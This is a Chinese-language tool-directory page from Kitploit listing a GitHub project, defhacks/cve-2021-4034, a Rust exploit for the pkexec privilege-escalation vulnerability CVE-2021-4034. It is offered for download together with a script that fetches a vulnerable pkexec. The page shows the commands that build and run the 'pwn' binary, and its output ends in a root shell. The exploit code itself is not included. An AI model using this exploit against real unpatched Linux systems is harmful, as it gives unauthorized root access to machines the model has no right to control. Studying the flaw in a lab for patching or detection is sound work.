Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/defhacks/cve-2021-4034
权限提升漏洞利用框架漏洞利用Payload 开发二进制利用
GitHubdefhacks/cve-2021-4034

cve-2021-4034

Rust 实现的 CVE-2021-4034 pkexec 权限提升漏洞利用程序,附带用于下载并解压易受攻击的 pkexec 进行测试的脚本。

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-4034 漏洞利用,但用 Rust 编写,为什么不呢?

基于 https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c

root@kitploit:~
$ ./download-and-unpack-vulnerable-pkexec.sh
*可选:为测试启用 setuid/setgid*
$ cargo run --bin prep && cd playground && cargo run --bin pwn
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `target/debug/prep`
    Finished dev [unoptimized + debuginfo] target(s) in 0.00s
     Running `/home/defhacks/hack/cve-2021-4034/target/debug/pwn`
gconv() called
sh-5.1# /bin/id
uid=0(root) gid=1000(defhacks) groups=1000(defhacks)
sh-5.1#
下载工具